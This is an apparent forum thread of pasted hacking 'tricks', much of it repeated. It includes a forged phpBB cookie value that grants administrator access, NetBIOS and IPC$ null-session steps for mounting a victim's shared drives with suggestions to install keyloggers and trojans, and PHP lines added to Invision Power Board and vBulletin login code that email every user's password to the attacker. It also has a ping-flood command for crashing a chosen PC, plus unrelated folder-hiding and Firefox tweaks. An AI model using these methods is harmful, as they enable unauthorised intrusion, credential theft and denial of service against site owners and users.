Tricks !!!
2 posters
Stranica 1 / 1.
Tricks !!!
download this cookie editor:
i dunno if it works with any other one, so yea...
get this code ready for later use
find a website that uses phpBB
youll see something like this at very bottom if it is
or just google this
Powered by phpBB 2.0.6 Š 2001, 2002 phpBB Group
make a noobish account on a site you pick
log out
pick "remember me" and login
open the cookie editing program i gave
in there, pick your browser from top, and click on "search" and search for the site you just registered...
put the code i gave you into "cookie value" and save
go back to your browser and open page again
and at the bottom, you will see "Go to Administration Panel"
click and do what ever you want with the forum
---
notes: i think this only works when you use internet explorer...
more notes: i can send screenshots if you want
more notes: the version might has to be the one i said, or maybe u can do it with the newer ones too, i dont know, go on ahead, test...
- Kod:
http://www.proxoft.com/downloads/cookieeditorsetup.exe
i dunno if it works with any other one, so yea...
get this code ready for later use
- Kod:
a%3A2%3A%7Bs%3A11%3Aautologinid%3Bb%3A1%3Bs%3A6%3Auserid%3Bs%3A1%3A2%3B%7D
find a website that uses phpBB
youll see something like this at very bottom if it is
or just google this
Powered by phpBB 2.0.6 Š 2001, 2002 phpBB Group
make a noobish account on a site you pick
log out
pick "remember me" and login
open the cookie editing program i gave
in there, pick your browser from top, and click on "search" and search for the site you just registered...
put the code i gave you into "cookie value" and save
go back to your browser and open page again
and at the bottom, you will see "Go to Administration Panel"
click and do what ever you want with the forum
---
notes: i think this only works when you use internet explorer...
more notes: i can send screenshots if you want
more notes: the version might has to be the one i said, or maybe u can do it with the newer ones too, i dont know, go on ahead, test...
Zadnja promjena: MIROR; pon lip 09, 2008 6:40 pm; ukupno mijenjano 1 put.
NETBIOS BASED HACKING, Using NetBIOS for hacking is the probably the easiest way to hack.....
Note- This tutorial may bear a resemblance to tutorials written by other authors. I have acknowledged to tutorials or articles that I referred before writing this tutorial. It is possible that there may be other tutorials I have not referred and are similar to my tutorial. It is not possible for me to give acknowledgment to such tutorials and hence there must be no copyright or legal issues regarding this tutorial.
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-
Name of the computer
Username
Domain
Computer Name
and many others.
Like any other service it also works on a port . It has been assigned a port number 139.
-----------------------------------------------------------------------------------------------------------
You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get
c:\windows>
If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.
Now lets play with the NBTSTAT command.
If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.
c:\windows>nbtstat/?
If you want to get the NetBIOS information of your computer type the following command
c:\windows>nbtstat -a 127.0.0.1
This command will list the NetBIOS information. A typical example
NetBIOS Remote Machine Name Table
Name Number Type Usage
==========================================================================
workgroup 00 G Domain Name
my_computer 03 U Messenger Service
myusername 03 U Messenger Service
MAC Address = 00-02-44-14-23-E6
****************************************************************************
WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.
SEARCHING FOR THE VICTIM
You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.
******************************************************************************
Lets Hack -Part 1 Remotely reading/writing to a victiim's computer
Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
The command that you will use to view the NetBIOS name is
c:\windows>nbtstat -a 203.195.136.156
Let suppose that the output comes out to be
NetBIOS Remote Machine Name Table
Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------------------------------------------------------------------------------------------------------------------------------
NOTE - If you do not get this number there are two possibilities
1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .
2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.
---------------------------------------------------------------------------------------------------------
Now our next step would be to view the drive or folders the victim is sharing.
We will use command
c:\windows>net view \\203.195.136.156
Let suppose we get the following output
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
CDISK Disk
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
HP-6L Print
"Print " shows that the victim is sharing a printer named as HP-6L
If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.
Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.
Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .
Lets do it.
We will use the NET command to do our work .
Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter.
If the command is successful we will get the confirmation - The command was completed successfullly
The command was completed successfully
Now just double click on the My Computer icon on your desktop and you will be a happy hacker!
We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!
***************************************************************************
Using IPC$ to hack Windows NT,2000,XP
Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.
IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.
We hackers use IPC$ in this way
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.
Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.
*********************************************************
PENETRATING INTO VICTIM's COMPUTER
Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...
But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission.
**************************************************************
PART 2 - DENIAL OF SERVICE ATTACK
This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.
The two most common vulnerabilities found in NetBIOS are
Vulnerability 1 - http://www.securityfocus.com/bid/1163
Vulnerability 2 - http://www.securityfocus.com/bid/1780
Another vulnerability that has been foud recently is that one can launch a DoS attack against winodws NT,2000,XP,.NET system. For detailed information and pacth plz visit this link http://www.microsoft.com/technet/treeview/...in/MS02-045.asp.
I have checked my web servers that are still vulnerable to this type of attack.
***********************************************************************
How to protect yourself
Please visit
windowsupdate.microsoft.com
and let the windows update itself.
************************************************************************
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-
Name of the computer
Username
Domain
Computer Name
and many others.
Like any other service it also works on a port . It has been assigned a port number 139.
-----------------------------------------------------------------------------------------------------------
You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get
c:\windows>
If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.
Now lets play with the NBTSTAT command.
If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.
c:\windows>nbtstat/?
If you want to get the NetBIOS information of your computer type the following command
c:\windows>nbtstat -a 127.0.0.1
This command will list the NetBIOS information. A typical example
NetBIOS Remote Machine Name Table
Name Number Type Usage
==========================================================================
workgroup 00 G Domain Name
my_computer 03 U Messenger Service
myusername 03 U Messenger Service
MAC Address = 00-02-44-14-23-E6
****************************************************************************
WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.
SEARCHING FOR THE VICTIM
You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.
******************************************************************************
Lets Hack -Part 1 Remotely reading/writing to a victiim's computer
Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
The command that you will use to view the NetBIOS name is
c:\windows>nbtstat -a 203.195.136.156
Let suppose that the output comes out to be
NetBIOS Remote Machine Name Table
Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------------------------------------------------------------------------------------------------------------------------------
NOTE - If you do not get this number there are two possibilities
1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .
2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.
---------------------------------------------------------------------------------------------------------
Now our next step would be to view the drive or folders the victim is sharing.
We will use command
c:\windows>net view \\203.195.136.156
Let suppose we get the following output
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
CDISK Disk
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
HP-6L Print
"Print " shows that the victim is sharing a printer named as HP-6L
If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.
Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.
Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .
Lets do it.
We will use the NET command to do our work .
Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter.
If the command is successful we will get the confirmation - The command was completed successfullly
The command was completed successfully
Now just double click on the My Computer icon on your desktop and you will be a happy hacker!
We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!
***************************************************************************
Using IPC$ to hack Windows NT,2000,XP
Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.
IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.
We hackers use IPC$ in this way
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.
Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.
*********************************************************
PENETRATING INTO VICTIM's COMPUTER
Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...
But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission.
**************************************************************
PART 2 - DENIAL OF SERVICE ATTACK
This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.
The two most common vulnerabilities found in NetBIOS are
Vulnerability 1 - http://www.securityfocus.com/bid/1163
Vulnerability 2 - http://www.securityfocus.com/bid/1780
Another vulnerability that has been foud recently is that one can launch a DoS attack against winodws NT,2000,XP,.NET system. For detailed information and pacth plz visit this link http://www.microsoft.com/technet/treeview/...in/MS02-045.asp.
I have checked my web servers that are still vulnerable to this type of attack.
***********************************************************************
How to protect yourself
Please visit
windowsupdate.microsoft.com
and let the windows update itself.
************************************************************************
Stealing Forum Users Passwords
Have you ever wanted a user on your sites password? In this short explanation i will give you the code to have whoever logs in information sent to your email.
First, your host must have the mail function enabled, or this will not work. Most free hosts dont have this enabled.
Invision Power Board:
Open:
sources/loginauth/login_core.php
Find:
/*-------------------------------------------------------------------------*/
// Authorize against local DB:
// $username: Log in username
// $password: Plain text password
/*-------------------------------------------------------------------------*/
function auth_local( $username, $password )
{
Add below:
$mailTo = "YOUREMAIL@GOESHERE.COM";
$mailSubject = "$username login information";
$mailMessage = "Username: $username
Password: $password
mail($mailTo, $mailSubject, $mailMessage);
Or you can just use this pre-edited login_core.php file:
If you use the pre-edited file above just replace your "sources/loginauth/login_core.php" file with the above file. And change the YOUREMAIL@GOESHERE.com with your email.
phpBB:
Coming soon
vBulletin:
With vBulletin you're going to have to do something else. vBulletin encrypts the users password into md5 before it is sent, so you will be sent a md5 hash. You are going to have to crack the md5 hash. I will list a few md5 hash cracking websites below, md5 hash's aren't always able to be cracked, but many times they will be cracked especially if the person uses a common or easy password.
Open:
/includes/functions_login.php
Find:
// ###################### Start verify_authentication #######################
function verify_authentication($username, $password, $md5password, $md5password_utf, $cookieuser, $send_cookies)
{
Add Below:
$mailTo = "YOUREMAIL@GOESHERE.com";
$mailSubject = "$username login information";
$mailMessage = "Username: $username
Password: $md5password
mail($mailTo, $mailSubject, $mailMessage);
Change YOUREMAIL@GOESHERE.com to your email address.
When you get an email it will look something like this
Username: myname
Password: 9cdfb439c7876e703e307864c9167a15
get the 9cdfb439c7876e703e307864c9167a15 and put it into a md5 cracker
md5 crack sites:
http://gdataonline.com/seekhash.php
http://milw0rm.com/cracker/insert.php (sometimes this one is full)
http://plain-text.info/add/ (sometimes this one is full)
First, your host must have the mail function enabled, or this will not work. Most free hosts dont have this enabled.
Invision Power Board:
Open:
sources/loginauth/login_core.php
Find:
/*-------------------------------------------------------------------------*/
// Authorize against local DB:
// $username: Log in username
// $password: Plain text password
/*-------------------------------------------------------------------------*/
function auth_local( $username, $password )
{
Add below:
$mailTo = "YOUREMAIL@GOESHERE.COM";
$mailSubject = "$username login information";
$mailMessage = "Username: $username
Password: $password
mail($mailTo, $mailSubject, $mailMessage);
Or you can just use this pre-edited login_core.php file:
If you use the pre-edited file above just replace your "sources/loginauth/login_core.php" file with the above file. And change the YOUREMAIL@GOESHERE.com with your email.
phpBB:
Coming soon
vBulletin:
With vBulletin you're going to have to do something else. vBulletin encrypts the users password into md5 before it is sent, so you will be sent a md5 hash. You are going to have to crack the md5 hash. I will list a few md5 hash cracking websites below, md5 hash's aren't always able to be cracked, but many times they will be cracked especially if the person uses a common or easy password.
Open:
/includes/functions_login.php
Find:
// ###################### Start verify_authentication #######################
function verify_authentication($username, $password, $md5password, $md5password_utf, $cookieuser, $send_cookies)
{
Add Below:
$mailTo = "YOUREMAIL@GOESHERE.com";
$mailSubject = "$username login information";
$mailMessage = "Username: $username
Password: $md5password
mail($mailTo, $mailSubject, $mailMessage);
Change YOUREMAIL@GOESHERE.com to your email address.
When you get an email it will look something like this
Username: myname
Password: 9cdfb439c7876e703e307864c9167a15
get the 9cdfb439c7876e703e307864c9167a15 and put it into a md5 cracker
md5 crack sites:
http://gdataonline.com/seekhash.php
http://milw0rm.com/cracker/insert.php (sometimes this one is full)
http://plain-text.info/add/ (sometimes this one is full)
Lock A Folder Without Installing Any Software
It was about locking folders with a little trick
Here i will show you what you need to do.
so.. to start off.
-select a folder you wish to lock (example: folder 'pictures')
-now make a batch file! how? here is how!
-open Notepad and write inside:
ren pictures pictures.{21EC2020-3AEA-1069-A2DD-08002B30309D}
-save the text file in the same directory as the pictures folder and name it Lock.bat (be sure to select saving as 'any file' and not .txt)
*now we have the locking batch file! ).gif
so.. lets make an unlocking file!
-open Notepad again, and write inside:
ren pictures.{21EC2020-3AEA-1069-A2DD-08002B30309D} pictures
-save the file in the same directory as before with the name Key.bat
**there it is! lock and key files!! now double-click on lock to lock the pictures folder, and double-click the key to unlock it !
you will notice that the pictures folder icon changed to the control panel icon and while locked will lead to the control panel.
you can use other shortcuts!!
here is my list:
{20D04FE0-3AEA-1069-A2D8-08002B30309D} - Turned to Explorer
{0DF44EAA-FF21-4412-828E-260A8728E7F1} - Turned to Start Menu Properties
{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} - Turned to Folder Options
{7007ACC7-3202-11D1-AAD2-00805FC1270E} - Turned to Network Connections
{D20EA4E1-3957-11d2-A40B-0C5020524152} - Turned to Fonts Folder
{D6277990-4C6A-11CF-8D87-00AA0060F5BF} - Turned to Shedule tasks
{E211B736-43FD-11D1-9EFB-0000F8757FCD} - Turned to Scanners & Camera
{645FF040-5081-101B-9F08-00AA002F954E} - Turned to Recycle bin
{2227A280-3AEA-1069-A2DE-08002B30309D} - Turned to Printers Folder
----
I hope you liked this little tut and that it will help you protect your private folders from nosy ppl in your home ).Take care!
Here i will show you what you need to do.
so.. to start off.
-select a folder you wish to lock (example: folder 'pictures')
-now make a batch file! how? here is how!
-open Notepad and write inside:
ren pictures pictures.{21EC2020-3AEA-1069-A2DD-08002B30309D}
-save the text file in the same directory as the pictures folder and name it Lock.bat (be sure to select saving as 'any file' and not .txt)
*now we have the locking batch file! ).gif
so.. lets make an unlocking file!
-open Notepad again, and write inside:
ren pictures.{21EC2020-3AEA-1069-A2DD-08002B30309D} pictures
-save the file in the same directory as before with the name Key.bat
**there it is! lock and key files!! now double-click on lock to lock the pictures folder, and double-click the key to unlock it !
you will notice that the pictures folder icon changed to the control panel icon and while locked will lead to the control panel.
you can use other shortcuts!!
here is my list:
{20D04FE0-3AEA-1069-A2D8-08002B30309D} - Turned to Explorer
{0DF44EAA-FF21-4412-828E-260A8728E7F1} - Turned to Start Menu Properties
{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} - Turned to Folder Options
{7007ACC7-3202-11D1-AAD2-00805FC1270E} - Turned to Network Connections
{D20EA4E1-3957-11d2-A40B-0C5020524152} - Turned to Fonts Folder
{D6277990-4C6A-11CF-8D87-00AA0060F5BF} - Turned to Shedule tasks
{E211B736-43FD-11D1-9EFB-0000F8757FCD} - Turned to Scanners & Camera
{645FF040-5081-101B-9F08-00AA002F954E} - Turned to Recycle bin
{2227A280-3AEA-1069-A2DE-08002B30309D} - Turned to Printers Folder
----
I hope you liked this little tut and that it will help you protect your private folders from nosy ppl in your home ).Take care!
make your firefox work alot faster
Now here are some Tips&Tricks that can help you double the speed of Firefox.
1. Type about:config in the address bar and then press Enter.
2. In the filter search bar type network.http.pipelining. Be sure the value field is set true,if not double-click to set true.
HTTP is the application-layer protocol that most web pages are transferred with. In HTTP 1.1, multiple requests can be sent before any responses are received. This is known as pipelining. Pipelining reduces page loading times, but not all servers support it.
3. Go back to the filter search bar and type network.http.pipelining.maxrequests. Double-click this option and set its value to 8.
4. In the filter search bar and type network.http.proxy.pipelining. Once opened double-click on it and set it to true.
5. In IPv6-capable DNS servers, an IPv4 address may be returned when an IPv6 address is requested. It is possible for Mozilla to recover from this misinformation, but a significant delay is introduced.
Type network.dns.disableIPv6 in the filter search bar and set this option to true by double clicking on it.
6. CONTENT INTERRUPT PARSING
This preference controls if the application will interrupt parsing a page to respond to UI events. It does not exist by default.
Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Boolean from the pop-up menu. Then:
A. Enter content.interrupt.parsing in the New boolean value pop-up window and click OK
B. When prompted to choose the value for the new boolean, select true and click OK.
7. Rather than wait until a page has completely downloaded to display it to the user, Mozilla applications will regularly render what has been received to that point. This option controls the maximum amount of time the application will be unresponsive while rendering pages.
Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Enter content.max.tokenizing.time in the New integer value pop-up window and click OK
B. You will be prompted to enter a value. Enter 2250000 and click OK.
8. CONTENT NOTIFY INTERVAL
This option sets the minimum amount of time to wait between reflows. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Type content.notify.interval in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.
9. CONTENT NOTIFY ONTIMER
A. This option sets if to reflow pages at an interval any higher than that specified by content.notify.interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Boolean from the pop-up menu.
B. Type content.notify.ontimer in the New boolean value pop-up window and click OK.
C. You will be prompted to choose the value for the new boolean. Select true and click OK.
10. Notify Backoffcount
This option controls the maximum number of times the content will do timer-based reflows. After this number has been reached, the page will only reflow once it is finished downloading. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.notify.backoffcount in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 5 and click OK.
11. CONTENT SWITCH THRESHOLD
You can interact with a loading page when content.interrupt.parsing is set to true. When a page is loading, the application has two modes: a high frequency interrupt mode and a low frequency interrupt mode. The first one interrupts the parser more frequently to allow for greater UI responsiveness during page load.
The low frequency interrupt mode interrupts the parser less frequently to allow for quicker page load. The application enters high frequency interrupt mode when you move the mouse or type on the keyboard and switch back to low frequency mode when you had no activity for a certain amount of time. This preference controls that amount of time. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.switch.threshold in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.
12. NGLAYOUT INITIALPAINT DELAY
Mozilla applications render web pages incrementally, they display whats been received of a page before the entire page has been downloaded. Since the start of a web page normally doesnt have much useful information to display, Mozilla applications will wait a short interval before first rendering a page. This preference controls that interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter nglayout.initialpaint.delay in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 0 and click OK.
1. Type about:config in the address bar and then press Enter.
2. In the filter search bar type network.http.pipelining. Be sure the value field is set true,if not double-click to set true.
HTTP is the application-layer protocol that most web pages are transferred with. In HTTP 1.1, multiple requests can be sent before any responses are received. This is known as pipelining. Pipelining reduces page loading times, but not all servers support it.
3. Go back to the filter search bar and type network.http.pipelining.maxrequests. Double-click this option and set its value to 8.
4. In the filter search bar and type network.http.proxy.pipelining. Once opened double-click on it and set it to true.
5. In IPv6-capable DNS servers, an IPv4 address may be returned when an IPv6 address is requested. It is possible for Mozilla to recover from this misinformation, but a significant delay is introduced.
Type network.dns.disableIPv6 in the filter search bar and set this option to true by double clicking on it.
6. CONTENT INTERRUPT PARSING
This preference controls if the application will interrupt parsing a page to respond to UI events. It does not exist by default.
Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Boolean from the pop-up menu. Then:
A. Enter content.interrupt.parsing in the New boolean value pop-up window and click OK
B. When prompted to choose the value for the new boolean, select true and click OK.
7. Rather than wait until a page has completely downloaded to display it to the user, Mozilla applications will regularly render what has been received to that point. This option controls the maximum amount of time the application will be unresponsive while rendering pages.
Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Enter content.max.tokenizing.time in the New integer value pop-up window and click OK
B. You will be prompted to enter a value. Enter 2250000 and click OK.
8. CONTENT NOTIFY INTERVAL
This option sets the minimum amount of time to wait between reflows. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Type content.notify.interval in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.
9. CONTENT NOTIFY ONTIMER
A. This option sets if to reflow pages at an interval any higher than that specified by content.notify.interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Boolean from the pop-up menu.
B. Type content.notify.ontimer in the New boolean value pop-up window and click OK.
C. You will be prompted to choose the value for the new boolean. Select true and click OK.
10. Notify Backoffcount
This option controls the maximum number of times the content will do timer-based reflows. After this number has been reached, the page will only reflow once it is finished downloading. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.notify.backoffcount in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 5 and click OK.
11. CONTENT SWITCH THRESHOLD
You can interact with a loading page when content.interrupt.parsing is set to true. When a page is loading, the application has two modes: a high frequency interrupt mode and a low frequency interrupt mode. The first one interrupts the parser more frequently to allow for greater UI responsiveness during page load.
The low frequency interrupt mode interrupts the parser less frequently to allow for quicker page load. The application enters high frequency interrupt mode when you move the mouse or type on the keyboard and switch back to low frequency mode when you had no activity for a certain amount of time. This preference controls that amount of time. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.switch.threshold in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.
12. NGLAYOUT INITIALPAINT DELAY
Mozilla applications render web pages incrementally, they display whats been received of a page before the entire page has been downloaded. Since the start of a web page normally doesnt have much useful information to display, Mozilla applications will wait a short interval before first rendering a page. This preference controls that interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter nglayout.initialpaint.delay in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 0 and click OK.
Âť Dos Attack Through CMD, Crash the PC of Ur Choice :D
Love Dos ? then this trick crashes the PC of ur choice on a network. Try it
A simple way to crash someones PC on a network or on the internet is by using the ping command.
Type (without the "): "ping -l 65500 -t <ip>"
Where: <ip>= the ip of the PC you wanna crash.
note: -l is a lowwercase L not an i
Enjoy n try !!!!this is an old trick
A simple way to crash someones PC on a network or on the internet is by using the ping command.
Type (without the "): "ping -l 65500 -t <ip>"
Where: <ip>= the ip of the PC you wanna crash.
note: -l is a lowwercase L not an i
Enjoy n try !!!!this is an old trick
Hacking Into A System ( Pics Included ), - Netbios Ripped :Dl
-What is it?-
NetBIOS Hacking is the art of hacking into someone else's computer through your computer. NetBIOS stands for "Network Basic Input Output System." It is a way for a LAN or WAN to share folders, files, drives, and printers.
-How can this be of use to me?-
Most people don't even know, but when they're on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.
-What do I need?-
Windows OS
Cain and Abel - get it from here
http://www.oxid.it/
Lets Start Then shuriken.gif
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Step 1, Finding the target.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross
Another window will pop up, make sure "All host in my subnet" is selected, and then click ok.
It should begin to scan.
Then IP's, computer names, and mac addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can't tell whether the IP address is a computer, router, modem, etc, that's ok.
During the next step we will begin our trial and error.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Part 2, Trial and Error]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
Now, we don't know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
